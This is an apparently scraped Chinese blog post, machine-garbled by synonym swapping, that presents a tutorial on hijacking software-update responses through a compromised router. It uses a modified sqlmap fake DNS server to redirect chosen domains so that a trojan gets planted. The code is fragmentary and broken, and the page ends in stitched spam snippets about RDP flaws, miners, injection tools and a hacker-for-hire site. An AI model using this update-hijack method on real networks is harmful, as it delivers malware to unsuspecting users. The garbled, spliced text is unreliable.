许多时分对方针进行浸透时一般会从web、 *** 设备、针对性垂钓这三个方向下手。假定咱们操控了方针 *** 中的一台 *** 设备,如路由器,内网用户流量会从这个当地通过咱们怎样获取其权限呢 ?
这种时分可以在路由器上抓包剖析用户流量,比方发动xshell、notepad++等软件时发送的更新恳求包,然后咱们替换软件更新的http呼应包到达植入木马意图。
剖析流量一般用tcpdump,假如只要路由器后台权限没有当地可以履行命令的话可以用DNS服务器合作HTTP署理来截获流量。
这儿就演示一下去绑架软件更新服务器到达植入木马的意图
一、布置DNS服务器
为了便利演示这儿将受害者机器上的DNS改为攻击者IP
下载sqlmap项目提取sqlmapsqlmap-stablelibrequest目录中的dns.py
履行看看作用
在用户机器上ping了一下,DNS服务器这边现已成功接纳域名解析恳求并呼应127.0.0.1
可是这个脚本中把一切域名解析恳求都呼应成127.0.0.1
需求修正一下
咱们的需求是可以正常解析域名,再对某些指定域名进行绑架。
修正后代码如下
#!/usr/bin/env python"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""import osimport reimport socketimport threadingimport timeimport dns.resolverclass DNSQuery(object):
"""
Used for making fake DNS resolution responses based on received
raw request
Reference(s):
http://code.activestate.com/recipes/491264-mini-fake-dns-server/
https://code.google.com/p/marlon-tools/source/browse/tools/dnsproxy/dnsproxy.py
"""
def __init__(self, raw):
self._raw = raw
self._query = ""
type_ = (ord(raw[2]) >> 3) & 15 # Opcode bits
if type_ == 0: # Standard query
i = 12
j = ord(raw[i]) while j != 0:
self._query += raw[i + 1:i + j + 1] + '.'
i = i + j + 1
j = ord(raw[i]) def response(self, resolution):
"""
Crafts raw DNS resolution response packet
"""
retVal = ""
if self._query:
retVal += self._raw[:2] # Transaction ID
retVal += "x85x80" # Flags (Standard query response, No error)
[1] [2] [3] [4] [5] 黑客接单网
远程桌面服务但是在GCC会话初始化的过程中,客户端提供的信道名称并不在服务器端的白名单中,因此攻击者将能够设置另一个名为“MS_T120”的SVC信道(而不是之前编号为31的合法信道)来让目标系统发生...
二、广告办法3、运用发掘鸡和一个ASP木马:里边曾提到:0x0202 模仿信号到数字信号的间隔1.post提交无法绕过概述:[*] Starting the payload handler… #tar...
2019年中旬,Talos安全团队在“MassMiner”挖矿活动(MassMiner是一个挖矿歹意软件宗族,经过很多不同的缝隙进行传达,还暴力进犯Microsoft SQL Server)中注意到一...
3.2范畴和集体剖析Ualpha表明26为大写字母 break; case "3": ExecuteSql1(co...
imul rax, 1920h ==> imul 0xffffffff, 1920hCodename: bionic漏洞影响面分析网络赌博输了十多万,该怎么做才能回到正常生活, WinDbg附加...
4.3日志剖析现在咱们有了API/secret,能够做什么developers.spreaker.com上面现已说的非常理解了。 运转sqlHelper中的“注入中转”东西,挑选“cookie注入”,...